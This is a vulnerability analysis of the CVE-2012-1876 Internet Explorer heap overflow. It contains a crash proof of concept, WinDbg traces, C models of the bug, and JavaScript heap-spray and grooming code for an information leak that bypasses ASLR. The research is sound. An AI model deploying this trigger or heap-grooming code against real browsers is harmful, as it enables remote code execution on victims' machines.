CVE-2012-1876 Internet Explorer Heap Overflow Vulnerability Analysis

Vulnerability description

The root cause of this Internet Explorer vulnerability is in CTableLayout::CalculateMinMax in mshtml.dll. When a table is laid out, the function uses the span attribute of a col element as the loop count for writing per-column records into a heap buffer. If the span value is changed after the buffer has already been sized for a smaller span, the loop writes past the end of the buffer and corrupts the heap.

Internet Explorer components

The Internet Explorer architecture is built around the Component Object Model (COM), which governs how all of the components interact and lets them be reused and extended. The figure below (not reproduced here) shows the main components of Internet Explorer.
[Figure: Internet Explorer component architecture]

  • IExplore.exe sits at the top of the stack; it is the Internet Explorer executable and relies on the other components for rendering, navigation, protocol handling and so on
  • Browseui.dll provides the Internet Explorer user interface, including the address bar, status bar and menu bar
  • Shdocvw.dll provides navigation, history and related features; it exposes the ActiveX control interface
  • Mshtml.dll is the core of Internet Explorer; it is responsible for HTML and CSS parsing
  • Urlmon.dll provides MIME handling and code download
  • WinInet.dll is the Windows Internet protocol handler; it implements HTTP and FTP and manages the cache

Analysis environment

Item             Version
Virtual machine  Windows 7 x86
Browser          Internet Explorer 8.0
Debugger         WinDbg

POC

<html>
<body>
    <table style="table-layout:fixed" >
        <col id="132" width="41" span="6" >&nbsp; </col>
    </table>

    <script>

    // Change the column's width and span after the table has already been
    // laid out once with span=6; the next layout pass reuses the 6-entry buffer
    function over_trigger() {
        var obj_col = document.getElementById("132");
        obj_col.width = "42765";
        obj_col.span = 666;
    }

    // Defer the change so that it happens after the initial layout
    setTimeout("over_trigger();",1);

    </script>
</body>
</html>

The code is straightforward: the col element is created with span=6, and over_trigger() then changes the span to 666 (any value large enough to overflow the buffer will do) together with a new width.

Vulnerability analysis

Save the POC as an .html file and open it. IE shows the blocked-content notification bar; at this point attach WinDbg to the IE process.

The attach list shows two IE processes. Choose the second one, the child process that owns the current tab, then set the following breakpoints:

0:012> bp mshtml!CTableLayout::CalculateMinMax
0:012> bp mshtml!_HeapRealloc
0:012> bp mshtml!CTableCol::GetAAspan

The root cause is in CTableLayout::CalculateMinMax, so a breakpoint there is mandatory. Because this is a heap overflow, a second breakpoint goes on _HeapRealloc. CTableCol::GetAAspan is the accessor that returns the value of the span attribute.

0:012> bd 1 2
0:012> bl
 0 e 6bcca078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
 1 d 6bd7d7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
 2 d 6bc4a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan

Breakpoints 1 and 2 are disabled for now. Run with g, allow the blocked content in IE, and click OK on the warning that pops up.

0:012> g
ModLoad: 6bb30000 6bbe2000   C:\Windows\System32\jscript.dll
Breakpoint 0 hit
eax=ffffffff ebx=004899c0 ecx=00412802 edx=ffffffff esi=00000000 edi=0245c334
eip=6891a078 esp=0245c0d8 ebp=0245c2f0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax:
6891a078 8bff            mov     edi,edi

Back in WinDbg, execution stops at the entry of CTableLayout::CalculateMinMax for the first time. This first pass handles the initial span value of 6. (The breakpoint address differs from the earlier bl listing because the listings were captured across separate debugging sessions; mshtml.dll is rebased by ASLR, so absolute addresses change between runs while offsets from symbols stay the same.)

0:005> kb
ChildEBP RetAddr  Args to Child              
0245c0d4 6891a6b8 004899c0 0245c368 00000000 mshtml!CTableLayout::CalculateMinMax
0245c2f0 68910879 0245c368 0245c334 00000001 mshtml!CTableLayout::CalculateLayout+0x276
0245c49c 68a1566c 0245d3b8 0245c6c8 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720
0245c5d4 68a118f9 004899c0 00000000 00000000 mshtml!CLayout::CalcSize+0x2b8
......

Look at the call stack and at the declaration of CTableLayout::CalculateMinMax:

void __thiscall CTableLayout::CalculateMinMax(CTableLayout *theTableLayoutObj, LPVOID lpUnknownStackBuffer);

The parameter of interest is the CTableLayout *theTableLayoutObj pointer; from the kb output above its value is 004899c0.

[Figure: dd 004899c0 before the first allocation]

Dumping 004899c0 shows the vftable pointer (68819aa0 in the captured screenshot), the span attribute value 00000006, and the pointer to the per-column heap buffer, which is still NULL because nothing has been allocated yet. The buffer pointer lives at offset 0x9c into the object, i.e. at 00489a5c.

0:005> be 1 2
0:005> bl
 0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
 1 e 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
 2 e 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan

Breakpoints 1 and 2 are enabled again.

0:005> g
Breakpoint 1 hit
eax=00000000 ebx=00000000 ecx=000000a8 edx=00000000 esi=00489a5c edi=00489a50
eip=689cd7a5 esp=0245c00c ebp=0245c024 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!_HeapRealloc:
689cd7a5 8bff            mov     edi,edi

After g, execution stops at the entry of mshtml!_HeapRealloc.

The function allocates heap space for the per-column records (the CTableColCalc entries that CalculateMinMax fills in). Each record is 0x1C bytes, and the number of records is determined by the span attribute value.

Because span is 6 in the POC, the requested size is 0x1C * 6 = 0xA8, which is exactly the value in ecx when _HeapRealloc breaks.

0:005> gu
eax=00000000 ebx=00000000 ecx=775a5dd3 edx=004b6657 esi=00489a5c edi=00489a50
eip=689e34e2 esp=0245c014 ebp=0245c024 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CImplAry::EnsureSizeWorker+0xa1:
689e34e2 8bd8            mov     ebx,eax

gu runs until _HeapRealloc returns, into CImplAry::EnsureSizeWorker, the growable-array helper that requested the allocation. Now dump the CTableLayout object again:

0:005> dd 004899c0 L30
004899c0  68819960 00464528 00439648 689ce3b8
004899d0  00000001 00000000 0108080d ffffffff
004899e0  00000000 00000000 00000000 ffffffff
004899f0  00017700 0000b478 00000000 00000000
00489a00  00000000 00412802 00000000 00000000
00489a10  00000000 00000006 00000000 ffffffff
00489a20  00000000 ffffffff 6881a594 00000004
00489a30  00000004 00475ed8 6881a594 00000018
00489a40  00000006 004a3660 00000000 00000000
00489a50  6881a594 00000000 00000000 004b6658
00489a60  00000000 00000000 00000000 00000000
00489a70  00000000 00000000 00000000 00000000

The buffer pointer at 00489a5c, which was NULL before the call, now holds the start address of the new buffer, 004b6658.

0:005> g
Breakpoint 2 hit
eax=00460a88 ebx=004899c0 ecx=00000034 edx=00000006 esi=004b6700 edi=00460a88
eip=6889a6cb esp=0245c02c ebp=0245c0d4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableCol::GetAAspan:
6889a6cb 8bff            mov     edi,edi
0:005> gu
eax=00000006 ebx=004899c0 ecx=00000002 edx=004312a8 esi=004b6700 edi=00460a88
eip=68aaf31f esp=0245c030 ebp=0245c0d4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x3ac:
68aaf31f 3de8030000      cmp     eax,3E8h

Continuing, execution stops in CTableCol::GetAAspan, which returns the span value that will serve as the loop count when the records are written. The result comes back in eax and is 6 here. The cmp eax,3E8h immediately after the call compares the span with 1000, which looks like an upper bound on the value; the 666 chosen by the POC stays below it.

0:005> ba w1 004b6658
0:005> bl
 0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
 1 e 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
 2 e 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
 3 e 004b6658 w 1 0001 (0001)  0:**** 
0:005> g
Breakpoint 3 hit
eax=00010048 ebx=00001004 ecx=004b6670 edx=00000010 esi=004b6658 edi=004b6670
eip=68c40a49 esp=0245c014 ebp=0245c01c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x2f:
68c40a49 eb2a            jmp     mshtml!CTableColCalc::AdjustForCol+0x5b (68c40a75)

Now follow the writes into the buffer. A write breakpoint on the first byte of the buffer (ba w1 004b6658) fires inside CTableColCalc::AdjustForCol.

The width in the POC is 41, and the value stored at the start of the first record at 004b6658 is width * 100 = 4100 = 0x1004, which is the value in ebx when the breakpoint fires. By the time the breakpoint fires the whole 0x1C-byte record has already been written, so single-step onward:

0:005> p
eax=00010048 ebx=00001004 ecx=004b6670 edx=00000010 esi=004b6658 edi=004b6670
eip=68c40a75 esp=0245c014 ebp=0245c01c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x5b:
68c40a75 5f              pop     edi
......
0:005> 
eax=00010048 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf47a esp=0245c030 ebp=0245c0d4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTableLayout::CalculateMinMax+0x558:
68aaf47a ff45ec          inc     dword ptr [ebp-14h]  ss:0023:0245c0c0=00000000
0:005> 
eax=00010048 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf47d esp=0245c030 ebp=0245c0d4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55b:
68aaf47d 8b45ec          mov     eax,dword ptr [ebp-14h] ss:0023:0245c0c0=00000001
0:005> 
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf480 esp=0245c030 ebp=0245c0d4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55e:
68aaf480 8345dc1c        add     dword ptr [ebp-24h],1Ch ss:0023:0245c0b0=00000000
0:005> 
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf484 esp=0245c030 ebp=0245c0d4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x562:
68aaf484 3b4510          cmp     eax,dword ptr [ebp+10h] ss:0023:0245c0e4=00000006

An inc/cmp pair appears here; this is the loop that writes one record into the buffer per iteration.

[ebp-14h] is the loop counter, incremented once per iteration; [ebp-24h] is the offset into the buffer and grows by 0x1C, one record, per iteration; the counter is then compared with [ebp+10h]:

0:005> dd [ebp+10h] L1
0245c0e4  00000006

[ebp+10h] holds the span value. Next, look at the second visit to CTableLayout::CalculateMinMax, after the script has raised span to 666. One would expect the buffer to be reallocated first, since 660 more records have to be stored, then the new span read as the loop count, and only then the records written.

Let the program run to the next hit and, on the way, confirm that six records were indeed written on the first pass:

0:005> bd 1 2 3 
0:005> bl
 0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
 1 d 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
 2 d 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
 3 d 004b6658 w 1 0001 (0001)  0:**** 
0:005> g
Breakpoint 0 hit
eax=ffffffff ebx=004899c0 ecx=00402c02 edx=ffffffff esi=00000000 edi=0245bb4c
eip=6891a078 esp=0245b8f0 ebp=0245bb08 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax:
6891a078 8bff            mov     edi,edi
0:005> kb L3
ChildEBP RetAddr  Args to Child              
0245b8ec 6891a6b8 004899c0 0245bb80 00000000 mshtml!CTableLayout::CalculateMinMax
0245bb08 68910879 0245bb80 0245bb4c 00000001 mshtml!CTableLayout::CalculateLayout+0x276
0245bcb4 68a1566c 0245d328 0245bee0 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720
0:005> dd 004899c0 L30
004899c0  68819960 00464528 00439648 689ce3b8
004899d0  00000001 00000000 010a081d 00002580
004899e0  00000000 00000000 0041da18 ffffffff
004899f0  00017700 0000b478 00000708 00000001
00489a00  00000000 00402c02 00000000 00000000
00489a10  00000000 00000006 ffffffff ffffffff
00489a20  ffffffff ffffffff 6881a594 00000004
00489a30  00000004 00475ed8 6881a594 00000018
00489a40  00000006 004a3660 00000000 00000000
00489a50  6881a594 00000018 00000006 004b6658
00489a60  00000000 00000000 00000000 00000000
00489a70  00000000 00000000 00000000 00000000

The next step should be the heap allocation, so re-enable the _HeapRealloc and GetAAspan breakpoints and run:

0:005> be 1 2
0:005> bl
 0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
 1 e 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
 2 e 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
 3 d 004b6658 w 1 0001 (0001)  0:**** 
0:005> g
Breakpoint 2 hit
eax=00460a88 ebx=004899c0 ecx=00000034 edx=00000006 esi=004b6700 edi=00460a88
eip=6889a6cb esp=0245b844 ebp=0245b8ec iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableCol::GetAAspan:
6889a6cb 8bff            mov     edi,edi
0:005> gu
eax=0000029a ebx=004899c0 ecx=00000002 edx=004312a8 esi=004b6700 edi=00460a88
eip=68aaf31f esp=0245b848 ebp=0245b8ec iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x3ac:
68aaf31f 3de8030000      cmp     eax,3E8h

But the allocation is skipped: _HeapRealloc is never hit because the code concludes that the buffer allocated earlier is already large enough, and execution goes straight to fetching the span value that controls the loop. When CTableCol::GetAAspan returns, eax is 0x29a, i.e. 666.

What follows is the same record-writing loop as before, except that 666 records are now written into a buffer that holds only 6, which is the heap overflow.

0:005> be 3
0:005> bd 1 2 
0:005> bl
 0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
 1 d 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
 2 d 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
 3 e 004b6658 w 1 0001 (0001)  0:**** 
0:005> g
Breakpoint 3 hit
eax=04141148 ebx=00414114 ecx=004b6670 edx=00004141 esi=004b6658 edi=004b6670
eip=68c40a49 esp=0245b82c ebp=0245b834 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x2f:
68c40a49 eb2a            jmp     mshtml!CTableColCalc::AdjustForCol+0x5b (68c40a75)

Re-enable the write breakpoint on the buffer so that it fires on the first write, then single-step. Note ebx: the new width 42765 becomes 42765 * 100 = 4276500 = 0x414114, the value written into each record and, once the loop runs past the buffer, into whatever lies behind it.

0:005> 
eax=04141148 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf47a esp=0245b848 ebp=0245b8ec iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTableLayout::CalculateMinMax+0x558:
68aaf47a ff45ec          inc     dword ptr [ebp-14h]  ss:0023:0245b8d8=00000000
0:005> 
eax=04141148 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf47d esp=0245b848 ebp=0245b8ec iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55b:
68aaf47d 8b45ec          mov     eax,dword ptr [ebp-14h] ss:0023:0245b8d8=00000001
0:005> 
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf480 esp=0245b848 ebp=0245b8ec iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55e:
68aaf480 8345dc1c        add     dword ptr [ebp-24h],1Ch ss:0023:0245b8c8=00000000
0:005> 
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf484 esp=0245b848 ebp=0245b8ec iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x562:
68aaf484 3b4510          cmp     eax,dword ptr [ebp+10h] ss:0023:0245b8fc=0000029a

Check the value at ebp+10h:

0:005> dd ebp+10h L1
0245b8fc  0000029a

[ebp+10h] now holds the span value 0x29a, so the loop will run 666 times. Execution continues after the overflow, the corrupted heap eventually causes an access violation, and IE crashes.

Summary:

  1. The program allocates the heap buffer according to the span attribute value
  2. It reads the span attribute and writes one record per column into the buffer in a loop
  3. The script then changes the span attribute
  4. On the next layout pass the allocation is skipped; the code wrongly assumes the existing buffer is large enough and goes straight to reading the new span as the loop count
  5. The loop writes the records into the too-small buffer, overflowing the heap and crashing the browser
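The five steps above, as an added model in C. This is illustrative code written for this page, not mshtml's code: the record field names, the `sized` flag that stands for "buffer already sized for this column set", and the treatment of the cmp eax,3E8h as a clamp at 1000 are assumptions. The buffer is sized once from the initial span, the write loop is driven by whatever span is current, and the hardened variant re-validates the capacity on every pass. Instead of corrupting memory, the model counts the writes that would have landed outside the buffer.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* One per-column record. Its size matches the 0x1C stride stepped over by
 * "add dword ptr [ebp-24h],1Ch"; the field names are assumed. */
typedef struct {
    int32_t min_width;     /* the three copies of width*100 seen in the dump */
    int32_t max_width;
    int32_t cur_width;
    int32_t flags;
    int32_t reserved[3];
} ColCalc;

/* Growable array in the spirit of CImplAry: a buffer plus its capacity. */
typedef struct {
    ColCalc *data;
    size_t   capacity;   /* records the buffer can hold */
    size_t   count;      /* records written on the last pass */
    int      sized;      /* assumed: "buffer already sized for this column set" */
} ColCalcArray;

/* Like EnsureSize: grow the buffer to hold `needed` records.
 * Returns the allocation size in bytes (0xA8 for span=6), 0 on failure. */
static size_t ensure_size(ColCalcArray *a, size_t needed) {
    if (needed > a->capacity) {
        ColCalc *p = realloc(a->data, needed * sizeof(ColCalc));
        if (p == NULL) return 0;
        a->data = p;
        a->capacity = needed;
    }
    return needed * sizeof(ColCalc);
}

/* The span as CalculateMinMax uses it. The "cmp eax,3E8h" right after the
 * GetAAspan call is treated here as an upper bound of 1000 (assumption). */
static unsigned effective_span(unsigned attr_span) {
    return attr_span > 1000 ? 1000 : attr_span;
}

/* Model of CalculateMinMax.
 *   fixed == 0: size the buffer only on the first pass (the bug)
 *   fixed == 1: re-validate the capacity against the current span on every pass
 * Returns how many record writes would have fallen outside the buffer; the
 * model skips them instead of overflowing the heap. */
static size_t calculate_min_max(ColCalcArray *a, unsigned attr_span, int width, int fixed) {
    unsigned span = effective_span(attr_span);
    if (fixed || !a->sized) {
        if (ensure_size(a, span) == 0) return span;  /* nothing is writable */
        a->sized = 1;
    }
    size_t oob = 0;
    for (unsigned i = 0; i < span; i++) {          /* inc [ebp-14h]; cmp eax,[ebp+10h] */
        if (i >= a->capacity) { oob++; continue; } /* this write would be the overflow */
        ColCalc *c = &a->data[i];
        c->min_width = c->max_width = c->cur_width = width * 100;  /* 41*100 = 0x1004 */
        c->flags = 0;
        memset(c->reserved, 0, sizeof c->reserved);
    }
    a->count = span;
    return oob;
}

typedef struct { size_t capacity; size_t oob_writes; int32_t last_width; } Replay;

/* Replays the POC: parse-time span=6/width=41, then the script's width=42765/span=666. */
static Replay replay_poc(int fixed) {
    ColCalcArray a = {0};
    Replay r;
    r.oob_writes  = calculate_min_max(&a, 6, 41, fixed);
    r.oob_writes += calculate_min_max(&a, 666, 42765, fixed);
    r.capacity    = a.capacity;
    r.last_width  = a.data[a.capacity - 1].cur_width;   /* last record that fit */
    free(a.data);
    return r;
}

int main(void) {
    Replay bug = replay_poc(0), ok = replay_poc(1);
    printf("record size 0x%zx, first allocation 0x%zx bytes\n", sizeof(ColCalc), 6 * sizeof(ColCalc));
    printf("vulnerable: capacity %zu, out-of-bounds record writes %zu\n", bug.capacity, bug.oob_writes);
    printf("fixed:      capacity %zu, out-of-bounds record writes %zu, last width 0x%x\n",
           ok.capacity, ok.oob_writes, ok.last_width);
    return 0;
}
```

With the buggy path the second pass keeps the 6-record buffer and 660 of the 666 writes fall outside it; with the check on every pass the buffer grows to 666 records before the loop starts. The last record that fits holds 42765 * 100 = 0x414114 in both cases, the value seen in ebx during the overflowing loop.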

Exploitation

To exploit a heap overflow, one first has to decide what gets overwritten and where. To bypass DEP and ASLR, VUPEN used the overflow to overwrite the length field of a BSTR; JavaScript can then read out of bounds through that string and fetch the CButtonLayout vftable pointer of a neighbouring object. The mshtml.dll base address follows from that pointer by a fixed offset, and the base is used to build the ROP chain that defeats DEP and ASLR.

The first step is therefore a heap layout that lets the mshtml.dll base address leak. The following code builds that layout:

<div id="test"></div>
        <script language='javascript'>
 
        var leak_index = -1;
 
        var dap = "EEEE";
        while ( dap.length < 480 ) dap += dap;
 
        var padding = "AAAA";
        while ( padding.length < 480 ) padding += padding;
 
        var filler = "BBBB";
        while ( filler.length < 480 ) filler += filler;
 
        //spray
        var arr = new Array();
        var rra = new Array();
 
        var div_container = document.getElementById("test");
        div_container.style.cssText = "display:none";
 
        for (var i=0; i < 500; i+=2) {
 
            // E
            rra[i] = dap.substring(0, (0x100-6)/2);
 
            // S, bstr = A
            arr[i] = padding.substring(0, (0x100-6)/2);
 
            // A, bstr = B
            arr[i+1] = filler.substring(0, (0x100-6)/2);
 
            // B
            var obj = document.createElement("button");
            div_container.appendChild(obj);
 
        }
 
        for (var i=200; i<500; i+=2 ) {
            rra[i] = null;
            CollectGarbage();
        }
 
        </script>

The script repeatedly allocates three strings, "EEEE...", "AAAA..." and "BBBB...", each cut to 125 characters so that its BSTR occupies exactly 0x100 bytes, and after each group creates a button element, which is backed by a CButtonLayout object.

In IE these strings are BSTRs (Basic Strings): a 4-byte length prefix, the characters as UTF-16 (2 bytes each) and a 2-byte NUL terminator. That is why the code divides by 2 and subtracts 6: (0x100 - 6) / 2 = 125 characters fills a 0x100-byte allocation exactly.

Then, starting at index 200, the "EEEE" strings in rra are released (rra only has even indices, so every E string from the middle of the spray onward is freed), leaving 0x100-byte holes for later 0x100-byte allocations to fall into.

The resulting heap layout is shown below:

[Figure: heap layout after the spray (image missing)]

The holes exist so that the vulnerable buffer (vulheap) lands in one of them; when the overflow happens it then runs into the "AAAA" and "BBBB" strings that follow.

<table style="table-layout:fixed" ><col id="0" width="41" span="9" >&nbsp; </col></table>
<table style="table-layout:fixed" ><col id="1" width="41" span="9" >&nbsp; </col></table>
<table style="table-layout:fixed" ><col id="2" width="41" span="9" >&nbsp; </col></table>
<table style="table-layout:fixed" ><col id="3" width="41" span="9" >&nbsp; </col></table>

Next a run of col elements is created, 132 in all (only the first four are shown), to fill the freed "EEEE" slots. With span=9 each buffer is 9 * 0x1C = 0xFC bytes, so it fits a 0x100-byte hole.
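The BSTR-length overwrite that this layout sets up, as an added model in C. This is illustrative code written for this page, not VUPEN's exploit and not the post's code; the layout of the region, the omission of heap chunk headers, and the record contents other than the three copies of width*100 are assumptions. It places a vulheap-sized buffer, an "AAAA" BSTR and a "BBBB" BSTR side by side, runs the record-writing loop with a span larger than the buffer, and shows the length prefix of the first string becoming 0x414114, after which a read that is bounds-checked only against that prefix returns bytes from the neighbouring string. That is the out-of-bounds read primitive the exploit uses to reach the CButtonLayout vftable.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define REC_SIZE    0x1C                      /* one CTableColCalc record, from the WinDbg session */
#define VUL_CAP     6                         /* records the buffer was sized for (span=6) */
#define VUL_BYTES   (VUL_CAP * REC_SIZE)      /* 0xA8, the size seen in ecx at _HeapRealloc */
#define BSTR_CHARS  125                       /* (0x100 - 6) / 2, as in the spray script */
#define BSTR_BYTES  (4 + 2 * BSTR_CHARS + 2)  /* length prefix + UTF-16 + terminator = 0x100 */

/* Assumed neighbourhood (simplified): vulheap, then BSTR "AAAA...", then BSTR "BBBB...".
 * Real heap chunks carry 8-byte headers between them; they are left out here. */
#define OFF_A        VUL_BYTES
#define OFF_B        (VUL_BYTES + BSTR_BYTES)
#define REGION_BYTES (VUL_BYTES + 2 * BSTR_BYTES)

static uint8_t region[REGION_BYTES];          /* constructed stand-in for the heap */

static void put32(uint8_t *p, uint32_t v) {   /* little-endian, as on x86 */
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static uint32_t get32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Lay out a BSTR: 4-byte byte length, UTF-16LE characters, 2-byte NUL. */
static void write_bstr(size_t off, char fill) {
    put32(region + off, 2 * BSTR_CHARS);
    for (size_t i = 0; i < BSTR_CHARS; i++) {
        region[off + 4 + 2 * i]     = (uint8_t)fill;
        region[off + 4 + 2 * i + 1] = 0;
    }
    region[off + 4 + 2 * BSTR_CHARS]     = 0;
    region[off + 4 + 2 * BSTR_CHARS + 1] = 0;
}

/* The vulnerable loop: `span` records written into a buffer that holds VUL_CAP.
 * Each record starts with three copies of width*100, as the dump shows.
 * Writes stop at the end of the modelled region so the example stays memory-safe. */
static size_t overflow_records(unsigned span, unsigned width) {
    uint32_t w = width * 100;                 /* 42765 * 100 = 0x414114 */
    size_t n = 0;
    for (unsigned i = 0; i < span; i++) {
        size_t off = (size_t)i * REC_SIZE;
        if (off + REC_SIZE > REGION_BYTES) break;   /* model boundary only, not a real check */
        put32(region + off, w); put32(region + off + 4, w); put32(region + off + 8, w);
        memset(region + off + 12, 0, REC_SIZE - 12);
        n++;
    }
    return n;
}

/* What the script does afterwards: scan the sprayed strings for the one whose
 * length no longer matches what was allocated. Returns its index or -1. */
static int find_corrupted_bstr(const size_t *offs, int n) {
    for (int i = 0; i < n; i++)
        if (get32(region + offs[i]) != 2 * BSTR_CHARS) return i;
    return -1;
}

/* charCodeAt() as the engine would evaluate it: checked only against the
 * length prefix, which the overflow now controls. -1: outside the string;
 * -2: outside the modelled region (a real exploit reads the neighbour object here). */
static int bstr_char_at(size_t off, uint32_t idx) {
    uint32_t len = get32(region + off);
    if ((uint64_t)idx * 2 + 1 >= len) return -1;
    size_t p = off + 4 + (size_t)idx * 2;
    if (p + 1 >= REGION_BYTES) return -2;
    return region[p] | (region[p + 1] << 8);
}

static const size_t sprayed[2] = { OFF_A, OFF_B };

/* Builds the layout, runs the overflow, returns BSTR A's length field afterwards. */
static uint32_t run_scenario(unsigned span, unsigned width) {
    memset(region, 0, sizeof region);
    write_bstr(OFF_A, 'A');
    write_bstr(OFF_B, 'B');
    overflow_records(span, width);
    return get32(region + OFF_A);
}

int main(void) {
    uint32_t len = run_scenario(6, 41);
    printf("span=6:  A length 0x%x, char[200] -> %d\n", len, bstr_char_at(OFF_A, 200));
    len = run_scenario(12, 42765);
    printf("span=12: A length 0x%x, corrupted string #%d, char[200] -> 0x%x\n",
           len, find_corrupted_bstr(sprayed, 2), bstr_char_at(OFF_A, 200));
    return 0;
}
```

With span=6 the records stay inside the buffer and a read at index 200 is rejected by the length check. With span=12 the seventh record starts exactly where the "AAAA" BSTR begins, so its length prefix becomes 0x414114; the same read at index 200 now passes the check and returns 0x42, a character from the "BBBB" string behind it. The script side of the real exploit finds the corrupted string the same way, by looking for the one whose length has changed.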

To confirm that the vulheap allocation really lands in a freed "EEEE" slot, first break on the function that frees the memory, CollectGarbage, which corresponds to JsCollectGarbage in jscript.dll.


Launch the IE process from WinDbg:

0:012> .childdbg 1
Processes created by the current process will be debugged

and enable child-process debugging with .childdbg, since the tab runs in a child process.

0:012> sxe ld:jscript

IE has not loaded jscript.dll yet at this point, so make the debugger break when that module is loaded:

0:012> g
ModLoad: 6be10000 6bec2000   C:\Windows\System32\jscript.dll
eax=00000000 ebx=00000000 ecx=00000074 edx=004c0e94 esi=7ffd9000 edi=022ac19c
eip=775970b4 esp=022ac0b4 ebp=022ac108 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!KiFastSystemCallRet:
775970b4 c3              ret

Type g and allow the blocked content; execution stops when jscript.dll is loaded.

0:005> bp jscript!JsCollectGarbage

Now set a breakpoint on JsCollectGarbage. Every heap free eventually reaches ntdll!RtlFreeHeap, whose third argument is the address of the block being freed, so a breakpoint there can log the address of every freed block:

0:005> bd 0
0:005> bl
 0 d 6be983d3     0001 (0001)  0:**** jscript!JsCollectGarbage
 0:005> bu ntdll!RtlFreeHeap ".echo free heap;db poi(esp+c) l10;g"

Disable the JsCollectGarbage breakpoint first so that execution is not interrupted on every collection. At function entry the return address is at [esp], so the third argument is at esp+c.

